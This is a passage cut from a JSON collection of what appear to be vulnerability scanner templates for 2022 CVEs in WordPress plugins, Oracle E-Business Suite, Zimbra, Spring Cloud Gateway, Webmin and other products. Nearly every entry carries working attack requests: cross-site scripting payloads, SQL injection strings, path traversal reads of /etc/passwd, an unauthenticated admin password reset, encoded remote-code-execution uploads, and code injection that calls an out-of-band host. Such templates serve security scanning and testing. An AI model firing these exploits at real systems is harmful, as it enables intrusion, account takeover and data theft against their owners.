CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/doAs?=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper <12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2\nHost: {{Hostname}}\n\naction=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3emvufr\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","/newspaper"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET 